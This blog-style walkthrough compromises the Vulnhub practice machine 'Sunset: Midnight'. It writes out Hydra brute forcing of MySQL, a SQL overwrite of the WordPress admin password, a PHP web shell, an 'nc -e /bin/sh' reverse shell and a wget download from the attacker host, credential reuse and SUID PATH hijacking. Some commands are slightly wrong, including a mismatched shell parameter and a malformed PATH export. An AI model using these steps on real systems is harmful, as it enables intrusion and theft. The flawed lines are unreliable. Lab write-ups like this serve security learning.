Hello Everyone
Welcome to another CTF walkthrough. Today I will show you how you can break the Sunset: Midnight machine from Vulnhub. So let’s get started.
First you need to download and import the OVA file into the virtual box. I’ve already done it and I believe that you guys can do that too. However here is the download link : https://www.vulnhub.com/entry/sunset-midnight,517/
After importing the OVA file of the machine, I have started the machine and run the netdiscover command to find the IP of the machine.
![](https://blog.knightsquad.org/wp-content/uploads/2021/04/sunset_midnight_ss1.jpg)
Now that I have the IP of the target machine, I have scan it with NMAP. I used the following command to scan the server / machine
nmap -sC -sV -oA scanresult 192.168.0.104
In this command I run the default script with -sC and the service / version detection with the -sV option. I used -oA to save scan results in the major three formats.
![](https://blog.knightsquad.org/wp-content/uploads/2021/04/sunset_midnight_ss2.jpg)
Nmap tell me that the server has 3 ports open and those are 22 (SSH), 80 (HTTP) and 3306 (MySQL). Since the machine has 80 ports open I went to my browser and try to view the website with IP 192.168.0.104 but it was not loading and it was redirecting to http://sunset-midnight , so I added the IP to my hosts file. I have used nano for this, you can use other editor.
![](https://blog.knightsquad.org/wp-content/uploads/2021/04/sunset_midnight_ss3.jpg)
After adding the IP in my hosts file I was able to visit the website and it was loading a WordPress site. So I went to http://sunset-midnight/wp-admin/ and tried some common passwords, but couldn’t find the right one. However, I got the correct username and that is admin.
Since I could not find any interesting information on the website, I have started enumerating the MySQL service. I read the MySQL related NMAP result and noticed that they used the mysql_native_password plugin for authentication. So, I thought why not try some common passwords. For this I have used THC-Hydra and rockyou.txt password list, you can use other tools like Medusa and others for the brute force attack. I used the following command for the brute force attack.
hydra -l root -P rockyou.txt 192.168.0.104 mysql -vv
![](https://blog.knightsquad.org/wp-content/uploads/2021/04/sunset_midnight_ss4.jpg)
I got the correct password for MySQL user “root” after the brute force attack ended. Now its time to log into the MySQL. For this I used the following command
mysql -h 192.168.0.104 -u root -p
I have entered the password and logged in to MySQL. Here I found the WordPress site’s database. I have used following command to list all the databases.
show databases;
![](https://blog.knightsquad.org/wp-content/uploads/2021/04/sunset_midnight_ss5.jpg)
I have select the WordPress database (wordpress_db) with following command.
use wordpress_db;
I have listed all the tables with following command
show tables;
![](https://blog.knightsquad.org/wp-content/uploads/2021/04/sunset_midnight_ss6.jpg)
The wp_users table is the most interesting table here. Because WordPress stores all its users in this table. So, I used the select query to see all the data of this table.
select * from wp_users;
After running the query, I found that the WordPress site only have one user and that is admin. Now it’s time to update the admin’s password. First I encrypted my password with MD5 and then I updated the admin password.
I have used following command to encrypt my password. Remember that here 123456 is the password.
echo -n "123456" | md5sum
I have updated admin’s password with following query.
update wp_users set user_pass = 'e10adc3949ba59abbe56e057f20f883e' where ID = 1;
Now, its time to log into WordPress admin panel. So I went to http://sunset-midnight/wp-admin/ and login with username “admin” and password “123456”.
Now I need a reverse shell to run system commands. So I used the theme editor to modify the theme’s PHP file. I added the following code int the footer.php file.
<?php system($_GET["noman"]); ?>
Now I went to the footer.php file with this link : http://sunset-midnight/wp-content/themes/twentynineteen/footer.php
First I checked if the server has Netcat. For this I ran which nc command through my shell.
http://sunset-midnight/wp-content/themes/twentynineteen/footer.php?cmd=which%20nc
The server has Netcat. So I created a reverse shell using the netcat with following command
http://sunset-midnight/wp-content/themes/twentynineteen/footer.php?cmd=nc%20-e%20/bin/sh%20192.168.0.103%209000
I ran the following command in my terminal to listen and boom I got a reverse shell.
nc -lvnp 9000
Now I had to spawn the shell. So I spawn the shell with python. I run the following Python command / script
python -c 'import pty;pty.spawn("/bin/bash")'
Now is the time to enumerate the system. But I did not have enough permission. So I checked the /etc/passwd file with the following command.
cat /etc/passwd
I got a user “Jose”. But I need a password to login. So I keep enumerating. I checked the wp-config.php file of the WordPress website and got the username and password of the database. The user was “Jose”. So I thought the user could use the same password for his account. So I copied the database password and tried to login to Jose account and boom ! I’m logged in as Jose.
Now we need to do privilege escalation. For this I used the LinEnum shell script to enumerate the whole system. I have downloaded the script and transferred it to the target machine.
I run the following command in my local machine to create a simple http server.
python -m http.server
I run the following command in target machine to get the LinEnum shell script
wget http://192.168.0.103:8000/LinEnum.sh
I have added execute permission to the script and I have run the script. After scanning the system with the LinEnum I have found an interesting binary file “status” with SUID. So I run the strings command to check the strings of the binary file.
![](https://blog.knightsquad.org/wp-content/uploads/2021/04/sunset_midnight_ss7.jpg)
The status binary file was using the service binary and does not have the full path of the service binary. So I have created a file called service in /tmp directory and inserted “/bin/sh” into the file and added execute permission to the file.
Now I have to import the /tmp directory in my PATH variable. To do this I have run the following command.
export PATH=/tmp;$PATH
After that I have run the status command and boom I’ve got root
Now its time to find the root.txt flag. I went to the root user’s home directory and found the root.txt flag.
I hope you guys enjoyed the walkthrough. Don’t forget to share your thoughts and feedback in the comments section.